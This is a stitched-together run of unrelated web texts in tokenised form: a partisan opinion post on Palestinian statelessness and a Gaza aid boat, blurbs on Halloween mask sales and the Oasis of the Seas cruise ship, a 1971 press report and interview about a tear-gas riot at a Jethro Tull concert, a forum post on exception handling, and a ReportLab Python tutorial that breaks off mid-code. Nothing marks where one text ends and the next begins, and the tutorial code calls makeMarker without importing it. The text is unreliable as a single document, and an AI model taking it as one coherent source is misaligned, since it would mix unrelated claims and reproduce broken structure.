They wave goodbye to their mother and set off .
But they do n’t turn down the alley to get to school , which should be only two minutes away , even for a boy in a wheelchair .
About the time that Mohammed was born , the Israeli army blocked the alley with a high concrete barrier .
Last week Mrs Taha told the BBC that the Israelis had ignored requests to open it to make it easier for him to get to school .
The barrier was put there by the army , to make life easier and safer for the Jewish settlers who sometimes use the street on the other side . ‘
The walls and checkpoints that enclose the Palestinians often make their lives hell , but pale in significance before their continued statelessness .
A stateless person ultimately has no rights , and can be robbed , relocated , and even killed with no recourse .
The statelessness of over 3 million Palestinians is among the great ongoing crimes of the 21st century , allowing them to be continually besieged , as civilians , deprived of basic services , and to some extent even of enough food ( 15 percent of Gazan children are malnourished as a direct result of Israeli actions ) .
In essence , they are slaves to the Israelis .
So why can the BBC do a story like this , which frankly says , “ A small community of Israelis lives in the centre of Hebron , in defiance of international laws that forbid an occupying power to settle its own people on the territory it has captured .
A strong force of Israeli combat troops protects the settlers , and has imposed years of restrictions on the Palestinians who live near them . ”
Why is such a passage never present in any major publication or broadcast originating in the United States ?
Here is something else that is not exactly front page news in the News Island of the United States :
A blockade - busting aid boat landed in Gaza , with several European lawmakers aborad , and met with Hamas leader Ismail Haniya .
So Haniya vowed eternal jihad , right ?
Nope :
‘ Following intensive negotiations with Hamas , the de facto leadership of Gaza , a group of European parliamentarians has been told by the organization that it will accept a Palestinian state within the internationally recognized 1967 borders as well as offer Israel a long - term ceasefire .
The delegation of 11 from Britain , Ireland , Switzerland and Italy , managed to break the Israeli blockade of Gaza on Saturday morning after their boat , the Dignity , sailed from Cyprus to Gaza , shadowed part of the way by an Israeli naval vessel .
The group had originally tried to enter Gaza from Israel ’s Erez border crossing but was refused permission by the Israeli authorities to cross .
Another attempt to enter the territory from Egypt ’s Rafah terminal was denied by the Egyptian authorities .
This was the third successful boat trip made by the Dignity into Palestinian coastal waters despite warnings by Israel that action would be taken to stop the vessel .
On board was a ton of medical aid and desperately needed medical equipment .
Despite the threats of naval intervention , in the end Israel backed down after realizing it would have gained more bad publicity if it had detained and harassed a boatload of international politicians carrying humanitarian aid .
The aim of the visit was to protest Israel ’s economic embargo and closure of Gaza ’s borders , assess humanitarian conditions on the ground , and to hold talks with Ismail Haniya , the leader of Hamas .
Haniya was questioned about his organization ’s previous offer of a 20 - year hudna or truce with Israel in exchange for the Israeli government recognizing the national rights of Palestinians .
British parliamentarian Clare Short , who served in the cabinet of former British Prime Minister Tony Blair , asked the Hamas leadership to repeat the offer , which he did .
Haniya was also questioned by delegation leader Baron Nazir Ahmed , a Pakistani - born member of the House of Lords , about Hamas ’ relationship with Iran .
“ Our ties with Iran are like those with other Muslim states .
We are prepared to accept a Palestinian state within the internationally recognized borders of 1967 .
Our conflict is not with the Jews , our problem is with the occupation , ” Haniya said . ’
Note that Gaza does not have an airport because the Israelis wo n’t allow one , and that the Israelis control Gaza ’s borders and port , keeping out anything and anyone they like , including food and fuel .
I ’d say that is tantamount to slavery .
THE reliability of opinion polls is doubtful but an alternative means exists for predicting the outcome of America 's election .
Purveyors of Halloween masks of presidential candidates take a ghoulish glee in claiming that they have accurately predicted the winner of the past seven elections : he who sells most , wins .
Luckily for Barack Obama , his masks are outselling those of John McCain by 54 % to 46 % .
He is beating Mr McCain in the sales of other presidential tat , too .
The Democratic former law professor is trouncing the ex-pilot in sales of action figures .
Mr McCain can take little comfort that those wanting to dress as the Wicked Witch of Wasilla , Sarah Palin , far outnumber Halloween Hillarys .
AP /Amazon.com
Pictured :
The world 's most luxurious cruise liner that really is a ' floating city '
These amazing images show the world 's largest ever cruise liner taking shape , complete with ' beach pool ' , shopping mall , rock - climbing walls , outdoor ampitheatre , and New York - style loft suites .
The state - of - the - art ' travelling city ' is being built on dry - docks in Finland .
Built for Royal Caribbean International , when Oasis of the Seas launches next November , she will be the largest and most revolutionary cruise ship in the world .
Floating city : The Oasis of the Seas will feature seven distinct neighbourhoods including a shopping mall
Green zone :
The cruise liner will have its own Central Park
The liner will span 16 decks , encompass 220,000 gross registered tons ( GRT ) , carry 5,400 guests and feature 2,700 staterooms .
Oasis of the Seas will be the first ship to tout the cruise line 's new neighborhood concept of seven distinct themed areas , which include Central Park , Boardwalk , the Royal Promenade , the Pool and Sports Zone , Vitality at Sea Spa and Fitness Center , Entertainment Place and Youth Zone .
Work on the super - cruise - liner is progressing full steam ahead at the Aker Yards of Turku - one of only a few shipyards capable of constructing a ship this size .
Wow : Oasis of the Seas will be the largest and most revolutionary cruise ship in the world
Taking shape :
The ship under construction at the Aker Yards of Turku in Finland
Almost 1200 feet long , 154 foot wide and rising 213 feet above the water line , the Oasis of the Seas will be able to host 3,000 crew to service every passenger 's need .
Adam Goldstein , CEO of Royal Caribbean International , said : ' In essence , we are the brand that delivers the " wow " and we have with this ship . '
In addition to the sheer size of the Oasis of the Seas , this £ 750 million liner will offer its thousands of passengers a number of ' firsts ' .
State - of - the - art :
The ship will feature New York - style loft suites
State - of - the - art : New York - style loft apartments
The introduction of 28 two - level New York - style loft suites which have never been seen before on an ocean going liner will redefine cruise ship accommodation .
Mr Goldstein believes innovation is crucial in attracting and retaining guests .
' It literally means that we are constantly coming up with things , ' he said .
' I can't imagine stagnating .
It 's in our DNA to keep coming up with things .
And Oasis allows us to crystallise the platform . '
For entertainment , the liner will feature a ' zip - line ' , which is similar to the assault course rope lines that span across water and over valleys .
Play - time :
There are plenty of entertainment options on board , including a basketball court
The zip - line on the Oasis of the Seas will allow passengers to face a sheer drop to the seas , guaranteeing an exhilarating experience .
But , most impressively is the introduction of seven special ' zones ' , each with its own unique character and style .
Of all these areas , the standout zone will be the aptly named ' Central Park ' .
Built into the middle of the ship , this football pitched sized area will literally be a park in the centre of the ship .
Setting sail : Still under construction , the Oasis of the Seas is set to sail in one year
Protected from the weather by a clear perspexed screen to let in the light , the Central Park area will be themed on Caribbean plants and foliage , to reflect the area which the ship will eventually will cruise in .
Designed by British firm Atkins Limited , the park zone will have distinct restaurants , bars and boutique shops , bringing the floating city idea to reality .
Top deck :
The ship has seven distinct zones
Chill out : Passengers can relax in the sea spa
It will also boast a rock wall , over 15 restaurants and bars , a casino , a theatre , two night - clubs and the largest freshwater pool on any cruise liner .
The ship will sail from her home port of Port Everglades in Fort Lauderdale in Florida .
In 2010 , she will be joined by a sister ship , Allure of the Seas .
Amazing views :
The ship 's huge ampitheatre
1967 -68 | 1969 | 1970 | 1971 | 1972 | 1973 | 1974 | 1975 | 1976 | 1977 | 1978 | 1979 | 1980 - 81 | 1982 -84 | 1987-89 | 1990 - 94 | 1995-98 | 1999-2001 | Home
Back | Next
LOS ANGELES FREE PRESS
18 June 1971
DENVER ROCK CONCERT ERUPTS WITH VIOLENCE AND TEAR GAS
A not - so pleasant evening with Jethro Tull
Red Rocks
Park outside of Denver , Colorado , is a natural rock amphitheater which has been converted into a permanent facility seating 9,500 people .
It used to be a beautiful place to have a rock concert .
After what came down on Thursday , June 10 , there will never be another rock concert at Red Rocks Park .
What came down last Thursday were rocks , bottles , curses , human beings and several varieties of tear gas .
" Riot " is a very ugly word , yet there is no other term which adequately describes what went on before and during the concert
The concert was scheduled to begin at 8:00 p.m. , and according to Denver police Lieutenant Jerry Kennedy the trouble started shortly before 7:00 .
An estimated one - to four - thousand people had situated themselves on the surrounding rocks and hills during the afternoon .
The concert had been sold out for two weeks , but many who had not been able to get tickets had come to take advantage of the natural location and see and hear what they could .
Problems started when a large number of the " hill people " started to climb over the back of the amphitheater in an attempt to get closer to the show .
The police , feeling that it would be impossible to maintain security in any other way due to the rough terrain , began dropping tear gas out of helicopters which were flying a dangerously low watch over the crowds .
Rather than acting as a deterrent , the tear gas seemed to spur the now - rioters on to further acts of violence
As more tear gas began to fill the amphitheater at an alarming rate , the gate - crashers and audience alike began to pick up bottles and rocks to use as ammunition against the police .
One car was overturned and burned , and many people suffered injuries ranging from broken bones to gas inhalation .
There was one officially denied report of a death due to a person getting hit with a tear gas canister and falling off a cliff .
While most of the turmoil was limited to the areas surrounding the amphitheater , the bleachers and stage were by no means free of problems .
Due to the natural canyon - like shape of the amphitheater , the tear gas was continually flowing down over the audience and collecting on the stage — a situation which forced Livingston Taylor , the opening act , to make a hasty exit before he had finished his set .
In addition to the tear gas , people on the surrounding rocks and hillsides began to throw in empty bottles and canisters of a very powerful type of tear gas known as Paralyzer Gas .
While the police handled the injuries on the outside , the medical people attached to the theater had more problems than they could handle .
Two doctors who had gone out into the audience to treat the more severe injuries had their medical bags stolen and were rendered virtually helpless , while inside the First Aid Station a small staff was doing an admirable job of splinting broken bones , bandaging cracked skulls and reviving many persons who had been overcome by the varieties of tear gas .
* * *
As we arrived at the entrance to the park , which turned out to be the first of several police roadblocks , we were three cars strong — the group in the first car ; Terry Ellis , Jethro 's manager and mentor , two PR people and myself in the second ; and four people from a Denver radio station in the third .
" The concert 's over ; turn around and get out " was the first thing we were told .
At this point and in spite of the unusually heavy concentration of police , we still did n't realize anything serious was wrong .
Terry jumped out of the car and managed to convince The Man that our three cars were indeed Jethro Tull and we had to get in there .
He was even convincing enough to gain a police escort — but only as far as the second roadblock .
By the time we drove the half - mile to the road leading to the backstage area , we knew there was something wrong .
We were stopped by a patrol car and informed , " They 're dropping gas in there .
You 've got to turn around . "
A brief argument earned the response , " Look , if you want trouble , we can give it to you . "
So we made the pretense of turning the cars around ; but instead of leaving we parked by the side of the road while Terry took off on foot to find out what was going on backstage .
As we stood outside the cars and waited for word from Terry , we could see the clouds of tear gas floating in over the amphitheater .
As we watched , the helicopters went in for another dangerously low pass , and the crowd began to scramble from the exits .
After about five minutes , the people began to return to their seats .
It looked as if things might be quieting down .
As we were watching this distant , unreal drama being played out about a half - mile from where we stood , the same cop who had offered us trouble a few minutes earlier returned and told us to follow him to the backstage area .
We drove the last half - mile slowly , not really having the slightest idea what we were getting into .
In all , it took us nearly an hour to drive the one - mile road into the park .
The small parking lot which constituted the backstage area was a sea of broken glass , and the acrid fumes of the tear gas were everywhere .
It was n’t until we started to walk through the tunnels leading to the dressing rooms that we got the full impact of the situation .
There were people passing out even as we walked by them .
People with opened skulls and blood dripping down their faces and clothes .
And mothers with small infants rushing to the First Aid Station for oxygen for their babies .
All of this for an evening of music under the stars .
I have witnessed several demonstrations - some of which have even been considered riots - but until I walked through that mountain tunnel last Thursday , I had never realized what war could be like .
This is a civilized country - or so they tell me - and all anybody was fighting for was a desire to listen to some good music .
We finally got to the dressing rooms ; and while lan and the rest of the group started dressing for the show , I found the promoter , Barry Fey , and asked him what was the situation .
" Well , I guess , what happened here , " he said , trying to get his breath and make a coherent statement , " I do n't know how many gate crashers — six hundred to a thousand is what they estimate — were over the top there .
And I guess it got out of hand : I guess they took a couple of police away to the hospital .
And someone threw tear gas , and it drifted over .
And of course the innocent people get hurt
It seems to be settled down now , but it 's hard to control up here .
There 's no communications , you can see it 's so vast that you do n't really know what 's going on . "
Fey went on to explain that they had fought for two years to get the park opened to rock concerts .
This concert was the first one to happen .
But Fey knew , even at that early point , that it would be the last .
" Well , if people have to get hurt it 's not worth it , " he concluded .
" That 's not what music is all about . "
Even as Fey spoke , the sound of exploding canisters of tear gas filled the air ; and within seconds , the gas itself began to filter down to the stage .
As I walked out on stage to take a look around , an empty wine bottle crashed at my feet ; and the man whose head it had bounced off of was being taken from his front - row seat with blood flowing freely from his opened head .
The nightmare was suddenly very real ; the tinge of immunity I had felt earlier was suddenly gone .
The general consensus was that we should " drop the show " and get the hell out of there .
But Terry was determined that the group would go on ; and the group was probably more relaxed than anybody , because they knew they had a show to do .
And then Ian went out on stage with his guitar .
There was a huge cheer , because somehow the people knew that everything was going to be all right .
The people inside the amphitheater settled down , and lan began to play .
I still do n't know what the opening song was , but I do know it had a very calming effect on the audience .
And backstage people were smiling through their gas - induced tears for the first time that evening .
As Ian finished the first song , his opening remark was :
" Welcome to World War Three . "
It worked , and the audience laughed and cheered .
While the problems inside the theater were virtually eliminated , there was apparently quite a bit of uneasiness outside .
Several times during the show , there were explosions of tear gas which would soon flow down over the audience and settle on the stage .
But the group kept playing .
Through everything the group kept playing .
During the heaviest attack , John Evans on piano and Ian were exchanging solos while people around the stage were passing out from the fumes .
John was choking and blinded from the tears , but he refused to stop playing ; and Ian just kept going like there was nothing wrong .
If there were any real heroes that evening , they were a rock and roll band called Jethro Tull .
During the encore , Barry Fey came over to me and said :
" God bless those guys .
They 're the most professional group I 've ever worked with .
I do n't know anybody else that would have stayed on through all that . "
Even on the following morning the police had nothing but praise for the way the group had conducted themselves .
Even the police , who sometimes seem incapable of practicing it , knew professionalism when they saw it .
When it comes to placing blame for the events of last Thursday evening , it must rest with the kids who tried to crash the gate .
But the rest of the chemistry is an all - too - familiar formula .
The police reacted with fear and stupidity .
While Red Rocks
Park is admittedly an impossible security maintenance area , the repeated dropping of tear gas did nothing but aggravate hostility and panic .
While there was probably no other action the police could take , no action would have been preferable .
There was never any threat of damage , and certainly the rocks would not have collapsed under the added weight of another thousand people .
But it 's over , and rock and roll has suffered another death - blow in Denver .
They say no one can take away our music ; but if we allow ourselves to destroy it , we will lose the right to have it .
The police and other officials are afraid of us , and we must first instill in them a sense of trust before they can provide the security for which we are asking .
And certainly gate crashing and the throwing of Paralyzer Gas do not lend any credibility to our desire for peace and music .
While the police were certainly guilty of gross misconduct and overreaction , we are ultimately to blame — at least in this particular case .
There are those that would blame the group and characterize them as " a group that starts riots . "
Nothing could be further from the truth .
There would have been a riot that evening no matter who had played .
It happened to be Jethro Tull .
And it happened to be Jethro Tull who got the audience calmed down .
And it happened to be Jethro Tull who played through the tear gas and earned the respect of audience and police alike .
I spoke with Ian Anderson about two hours after the concert .
His views on the incident follow .
I want to start by talking about what happened tonight .
How do you react to a situation like that ?
First of all , how did you keep singing and playing through all the tear gas ?
" Well , the embarrassment of stopping is far worse than the mild pain of having a bit of tear gas down your lungs .
That 's just uncomfortable for a few minutes .
If you suddenly stopped or something , that would be something you 'd have to live with for weeks afterwards — the embarrassment of it .
So it 's a very simple answer . "
Was it embarrassment , or did you feel a responsibility to keep playing and maintain what control you could ?
" Well , not really .
Responsibility 's a funny word ; I do n't think it applies in a situation like this .
Basically it is embarrassment .
In any circumstance where you 're on stage in front of people and something goes wrong , it has to be absolutely disastrous before you 'd ever turn around and walk off stage or stop in the middle of a song .
It would have to be total power failure or something ; and even in the event of total power failure , we would n't go off stage .
We 'd stay on , and I 'd sort of scream insanities at the audience , or do a tap dance or something like that .
It 's a bit like show biz .
The show must go on ; it 's that kind of a feeling .
" But it is n't a question of responsibilities or application of some kind of pop music ethics .
It 's really just a question of ... you feel such a twit if you can't handle a situation , so you struggle on .
I mean , that stuff 's really nasty ; it 's still very painful .
I sucked it right down to the bottom breathing very deeply .
It 's even painful now ; it 's like having bad indigestion . "
Is that the worst situation you 've ever been faced with ?
" Well , not really , because it was n't affecting me personally — apart from the tear gas thing .
It was a situation in which the sooner we got on stage the better as far as everyone was concerned .
" My views as far as the way the situation was handled — Although I have always had a certain understanding for the job of the average cop , I still feel that from the top it was handled badly .
I 'm not talking about the average guy in blue .
But from the top , they do n't know what they 're doing .
They 're not sufficiently intelligent enough to be sheriffs or police chiefs or whatever .
I mean they 're really thick idiots ; they do n't understand the job .
They do have a responsibility .
To be a chief of police you really have to be responsible for lives — human lives , and I really do n't believe those people are .
I do n't think they 've really come to grips with their position in terms of power .
" I mean , I have a certain power when I 'm standing on a stage — "
More than they did , obviously .
" Well , it 's arguable .
Perhaps under certain circumstances .
But I would never use power if it was at all avoidable — certainly if there was any risk to people 's well - being — but it 's really dangerous .
I would far rather play the game of being the clown or something and just try to make people forget what was going on .
And just try to let it blow over — literally — and hope that by the time it got to the end people would leave quietly having thought , " Well , we got gassed tonight , but it 's all over now , " rather than try to make sort of inflammatory speeches and discuss the moral standpoint of the kid versus the cops . "
NEXT WEEK : The rest , and more pleasant parts of my lengthy interview with Jethro Tull 's Ian Anderson .
CHRIS VAN NESS
Back | Next
Top | Home
Home » forums » LtU Forum A Modular , Verifiable Exception - Handling Mechanism
A while back I began tinkering with the idea of continuation - carrying exceptions as an approach to divide error handling policy from the mechanism .
Of course , I later discovered I was putting old wine into new bottles .
Common Lisp follows a similar approach with its Condition / Restart mechanism .
Anyhow , at that time a friend pointed me towards A Modular Verifiable Exception - Handling Mechanism by S.Yemini and D.Berry ( 1985 ) .
The following varieties of handler responses to an exception can be identified in the literature : Resume the signaller :
Do something , then resume the operation where it left off .
Terminate the signaller :
Do something , then return a substitute result of the required type for the signalling operation ; if the operation is not a value returning operation , this reduces to doing something and returning to the construct following the invocation of the operation .
This includes using alternative resources , alternative algorithms , and so on .
Retry the signaller :
Do something , then invoke the signaller again .
Propagate the exception :
Do something , then allow the invoker of the invoker of the signalling operation to respond to the detection of the exception .
Transfer control :
Do something , then transfer control to another location in the program .
This includes doing something and then terminating a closed construct containing the invocation .
This paper presents a new model for exception handling , called the replacement model .
The replacement model , in contrast to other exception - handling proposals , supports all the handler responses of resumption , termination , retry , and exception propagation , within both statements and expressions , in a modular , simple , and uniform fashion .
The model can be embedded in any expression - oriented language and can also be adapted to languages which are not expression oriented with almost all the above advantages .
This paper presents the syntactic extensions for embedding the replacement model into Algol 68 and its operational semantics .
Without [ an exception - handling mechanism ] , too much information is not hidden and coupling is high .
Either the signaler has to be told more about what the invoker is doing , so that the signaler can do what the invoker would want done , or else the invoker has to be given more implementation details so that it can do the exception checking .
Whether the exception - handling mechanism be continuations or something else , I 'd really love to see the modern stack - based languages ( Java , C++ , etc. ) implement something much more along these lines .
I have been bitten far too often by the high coupling that comes from the inability to separate error handling policy from the exception handling mechanism .
Comment viewing options
Flat list - collapsed Flat list - expanded Threaded list - collapsed Threaded list - expanded Date - newest first Date - oldest first Select your preferred way to display the comments and click " Save settings " to activate your changes .
UPDATE ( Mar. 26 , 2010 ) Just realized I never posted the link to the PDF the code here generates : here it is .
My bad .
I ’ve been doing a little reporting project , and I ’ve been searching around for quite some time for a good graphing and charting solution for general - purpose use .
I had come across ReportLab before , but it just looked so huge and convoluted to me , given the simplicity of what I wanted at the time , that I moved on .
This time was different .
This time I needed a lot of the capabilities of ReportLab .
I needed to generate PDFs ( this is not a web - based project ) , I needed to generate charts , and I wanted the reports I was generating to contain various types of text objects in addition to the charts and such .
I took the cliff - dive into the depths of the ReportLab documentation .
I discovered three things :
There is quite a lot of documentation ReportLab is quite a capable library
The documentation actually defies the simplicity of the library .
It ’s a decent bit easier than it looks in the documentation , so I thought I ’d take you through an example .
This example is dead simple , but I still think it ’s a little more practical than what I was able to find .
The ReportLab documentation refers to what sounds like a great reference example , but the problem is that the tarball I downloaded did n’t contain the files it was making reference to 🙁
I started out by investigating one of the small example projects in the “ demo ” directory of the ReportLab directory .
It was called “ gadflypaper ” ( Ironically , written by Aaron Watters .
I worked in the cube outside of his office for several months last year — Hi Aaron ! ) .
Aaron ’s example was very simple , and a great starting point to start understanding how to put together a very basic document .
It ’s not infested with abstractions — just a few simple functions , and a lot of text .
I ripped out a lot of the text until I had just an example of each function in action , and then set to work .
The Basic Process
To simplify the work of doing page layout minutiae , I ( like the example ) used PLATYPUS , which is built into ReportLab and abstracts away some of the low - level layout details .
If you * want * low - level control , however , you can do whatever you want with the pdfgen module , also included ( and PLATYPUS is basically a layer built from it ) .
With PLATYPUS , you get access to a bunch of prebuilt layout - related objects , representing things like paragraphs , tables , frames , and other things .
You also have access to page templates , so that dealing with things like frame placement is a little easier .
So , to give you a rundown of the high - level steps :
Choose a page template , and use it to create a document object .
Create your “ flowables ” ( paragraphs , charts , images , etc ) , and put them all into a list object .
In ReportLab documentation , this is often referred to as a list named “ story ” Pass the list object to the build ( ) method of the document object you created in step 1 .
Phase 1 : Let ’s Get Something Working
As a first phase , let ’s just make sure we can do the simplest of documents .
Here ’s some code that should work if you have a good installation of ReportLab ( I ’m using whatever was the latest version in early October , 2008 . )
Note that we ’ll be cleaning this up and simplifying it as we go along .
#!/usr/bin/env python from reportlab.platypus import * from reportlab.lib.styles import getSampleStyleSheet from reportlab.rl_config import defaultPageSize from reportlab.lib.units import inch PAGE_HEIGHT=defaultPageSize[ 1 ] styles = getSampleStyleSheet () Title = Paragraph ( " Generating Reports with Python " , styles [ " Heading1 " ] )
Author = Paragraph ( " Brian K. Jones " , styles [ " Normal " ] ) URL = Paragraph ( " http://protocolostomy.com " , styles [ " Normal " ] ) email = Paragraph ( " bkjones +_at_+ gmail.com " , styles [ " Normal " ] ) Abstract = Paragraph ( " " " This is a simple example document that illustrates how to put together a basic PDF with a chart .
I used the PLATYPUS library , which is part of ReportLab , and the charting capabilities built into ReportLab . " " " , styles [ " Normal " ] )
Elements = [ Title , Author , URL , email , Abstract ] def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) go ( )
Not a lot of actual code here .
It ’s mostly variable assignments .
The variables are mostly just strings , but because I want to control how they ’re arranged , I need to make them “ Flowables ” .
Remember that PLATYPUS puts together a document by processing a list of Flowable objects and drawing them onto the document .
So all of our strings are “ Paragraph ” objects .
You ’ll note , too , that Paragraph objects can be styled using definitions accessed from getSampleStyleSheet , which returns a ‘ style object ’ .
If you create one of these at the Python interpreter , and call the resulting object ’s ‘ list ( ) ’ function , you ’ll see what styles are available , and you ’ll also see what attributes each style has .
Try running this code to make sure things work .
Change the strings if you like 🙂
Phase 2 : Simple Cleanup
I have n’t yet created insane layers of abstraction in my own code , because I ’ve been working on deadlines and doing things that are relatively simple .
This will inevitably change 🙂
However , there are some things you can do to make life a bit simpler and cleaner .
#!/usr/bin/env python from reportlab.platypus import * from reportlab.lib.styles import getSampleStyleSheet from reportlab.rl_config import defaultPageSize from reportlab.lib.units import inch PAGE_HEIGHT=defaultPageSize[ 1 ] styles = getSampleStyleSheet ()
Title = " Generating Reports with Python " Author = " Brian K. Jones " URL = " http://protocolostomy.com " email = " bkjones@gmail.com " Abstract = " " " This is a simple example document that illustrates how to put together a basic PDF with a chart .
I used the PLATYPUS library , which is part of ReportLab , and the charting capabilities built into ReportLab . " " " Elements= [ ]
HeaderStyle = styles [ " Heading1 " ] ParaStyle = styles [ " Normal " ]
PreStyle = styles [ " Code " ] def header ( txt , style=HeaderStyle , klass =Paragraph , sep=0.3 ) : s = Spacer ( 0.2*inch , sep*inch ) Elements.append(s ) para = klass ( txt , style ) Elements.append ( para ) def p( txt ) : return header ( txt , style =ParaStyle , sep=0.1 ) def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) header ( Title ) header ( Author , sep=0.1 , style =ParaStyle ) header ( URL , sep=0.1 , style =ParaStyle ) header ( email , sep=0.1 , style =ParaStyle ) header ( " ABSTRACT " ) p( Abstract ) go ( )
So , this is still simple .
Simplistic , even .
All I did was move the repetitive bits to functions .
The ‘ header ’ and ‘ p ’ functions are ( for now ) unaltered from the gadflypaper demo .
The good part here is that strings can be defined as ‘ just strings ’ .
Paragraphs and headers are just plain old string variables , and then at the bottom I just call the ‘ header ’ and ‘ p ’ functions and pass in the variables .
The order in which I call the functions determines the order my document will appear in .
Phase 3
There ’s kind of an issue with the way these functions work , at least for my needs .
The problem is that they just go ahead and add things to the “ Elements ” list automagically .
This might be ok for some quick and dirty tasks , but in my case I found that I needed more control .
Things were crossing page boundaries where I did n’t want them to , and if I want to add formatting or apply built - in functionality , I ca n’t do it on a per- object basis without loading up the argument list .
I also wanted to have a relatively easy way to move * sections * of reports around , where a section might consist of a heading , a paragraph , and a source code listing — three different “ Flowable ” objects .
So I altered these functions to make them return flowables instead of just adding things to the Elements list for me :
#!/usr/bin/env python from reportlab.platypus import * from reportlab.lib.styles import getSampleStyleSheet from reportlab.rl_config import defaultPageSize from reportlab.lib.units import inch PAGE_HEIGHT=defaultPageSize[ 1 ] styles = getSampleStyleSheet ()
Title = " Generating Reports with Python " Author = " Brian K. Jones " URL = " http://protocolostomy.com " email = " bkjones@gmail.com " Abstract = " " " This is a simple example document that illustrates how to put together a basic PDF with a chart .
I used the PLATYPUS library , which is part of ReportLab , and the charting capabilities built into ReportLab . " " " Elements= [ ]
HeaderStyle = styles [ " Heading1 " ] ParaStyle = styles [ " Normal " ]
PreStyle = styles [ " Code " ] def header ( txt , style=HeaderStyle , klass =Paragraph , sep=0.3 ) : s = Spacer ( 0.2 * inch , sep*inch ) para = klass ( txt , style ) sect = [ s , para ] result = KeepTogether ( sect ) return result def p( txt ) : return header ( txt , style =ParaStyle , sep=0.1 ) def pre(txt ) : s = Spacer ( 0.1*inch , 0.1 * inch ) p = Preformatted ( txt , PreStyle ) precomps = [ s , p ] result = KeepTogether ( precomps ) return result def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) mytitle = header ( Title ) myname = header ( Author , sep=0.1 , style =ParaStyle ) mysite = header ( URL , sep=0.1 , style =ParaStyle ) mymail = header ( email , sep=0.1 , style =ParaStyle ) abstract_title = header ( " ABSTRACT " ) myabstract = p( Abstract ) head_info = [ mytitle , myname , mysite , mymail , abstract_title , myabstract ] Elements.extend( head_info ) code_title = header ( " Basic code to produce output " ) code_explain = p ( " " " This is a snippet of code .
It 's an example using the Preformatted flowable object , which makes it easy to put code into your documents .
Enjoy ! " " " ) code_source = pre ( " " " def header ( txt , style=HeaderStyle , klass =Paragraph , sep=0.3 ) : s = Spacer ( 0.2 * inch , sep*inch ) para = klass ( txt , style ) sect = [ s , para ] result = KeepTogether ( sect ) return result def p( txt ) : return header ( txt , style =ParaStyle , sep=0.1 ) def pre(txt ) : s = Spacer ( 0.1*inch , 0.1 * inch ) p = Preformatted ( txt , PreStyle ) precomps = [ s , p ] result = KeepTogether ( precomps ) return result def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) " " " ) codesection = [ code_title , code_explain , code_source ] src = KeepTogether ( codesection ) Elements.append( src ) go ( )
So , this is n’t too bad .
It ’s still functional programming .
I ’ll revamp it in another post to use objects , but for those readers who are still learning all of this , it might help to leave out the abstraction for now .
What I liked about the gadflypaper demo was that it was quick and dirty .
You could read it line by line , top to bottom , and understand what just happened without jumping back and forth between main ( ) code and object code .
As you can see , I ’m using the KeepTogether ( ) method , in two different ways .
In the functions , I use it so I do n’t have to go back later and manually add spacer elements to the Elements array .
Then , toward the bottom , I create a preformatted code snippet , and I use the KeepTogether method to make sure that all parts in the code section stay together without flowing across a page boundary .
There are other options you can use to customize how your document deals with ‘ orphan ’ and ‘ widow ’ elements as well , so definitely check out the documentation for that ( or keep reading this blog .
i’ll get to it eventually ) .
So what ’s left ?
Phase 4 : The Grand Finale
The rest of the code I add is to connect to a database , make a query , and then pass the data returned from the database to a function that creates a chart .
I add the chart to the Elements , and we ’re in business !
#!/usr/bin/env python import MySQLdb import sys import string from reportlab.graphics.shapes import Drawing from reportlab.graphics.charts.linecharts import HorizontalLineChart from reportlab.platypus import * from reportlab.lib.styles import getSampleStyleSheet from reportlab.rl_config import defaultPageSize from reportlab.lib.units import inch dbhost = ' localhost ' dbname = ' httplog ' dbuser = ' jonesy ' dbpasswd = ' mypassword ' PAGE_HEIGHT=defaultPageSize[ 1 ] styles = getSampleStyleSheet ()
Title = " Generating Reports with Python " Author = " Brian K. Jones " URL = " http://protocolostomy.com " email = " bkjones@gmail.com " Abstract = " " " This is a simple example document that illustrates how to put together a basic PDF with a chart .
I used the PLATYPUS library , which is part of ReportLab , and the charting capabilities built into ReportLab . " " " Elements= [ ]
HeaderStyle = styles [ " Heading1 " ] ParaStyle = styles [ " Normal " ]
PreStyle = styles [ " Code " ] def header ( txt , style=HeaderStyle , klass =Paragraph , sep=0.3 ) : s = Spacer ( 0.2 * inch , sep*inch ) para = klass ( txt , style ) sect = [ s , para ] result = KeepTogether ( sect ) return result def p( txt ) : return header ( txt , style =ParaStyle , sep=0.1 ) def pre(txt ) : s = Spacer ( 0.1*inch , 0.1 * inch ) p = Preformatted ( txt , PreStyle ) precomps = [ s , p ] result = KeepTogether ( precomps ) return result def connect ( ) : try : conn1 = MySQLdb.connect ( host = dbhost , user = dbuser , passwd = dbpasswd , db = dbname ) return conn1 except MySQLdb .
Error , e : print " Error %d : %s " % ( e.args [ 0 ] , e.args [ 1 ] ) sys.exit ( 1 ) def getcursor ( conn ) : cursor = conn.cursor ( ) return cursor def totalevents_hourly ( rcursor ) : rcursor.execute ( " " " select hour , count ( * ) as hits from hits group by hour ; " " " ) return rcursor def graphout ( catnames , data ) : drawing = Drawing ( 400 , 200 ) lc = HorizontalLineChart ( ) lc.x = 30 lc.y = 50 lc.height = 125 lc.width = 350 lc.data = data catNames = catnames lc.categoryAxis.categoryNames = catNames lc.categoryAxis.labels.boxAnchor = ' n ' lc.valueAxis.valueMin = 0 lc.valueAxis.valueMax = 1500 lc.valueAxis.valueStep = 300 lc.lines[0].strokeWidth = 2 lc.lines [ 0 ] .symbol = makeMarker (' FilledCircle ' ) # added to make filled circles .
lc.lines [ 1].strokeWidth = 1.5 drawing.add( lc ) return drawing def go ( ) : doc = SimpleDocTemplate ( ' gfe.pdf ' ) doc.build ( Elements ) mytitle = header ( Title ) myname = header ( Author , sep=0.1 , style =ParaStyle ) mysite = header ( URL , sep=0.1 , style =ParaStyle ) mymail = header ( email , sep=0.1 , style =ParaStyle ) abstract_title = header ( " ABSTRACT " ) myabstract = p( Abstract ) head_info = [ mytitle , myname , mysite , mymail , abstract_title , myabstract ] Elements.extend( head_info ) code_title = header ( " Basic code to produce output " ) code_explain = p ( " " " This is a snippet of code .
It 's an example using the Preformatted flowable object , which makes it easy to put code into your documents .
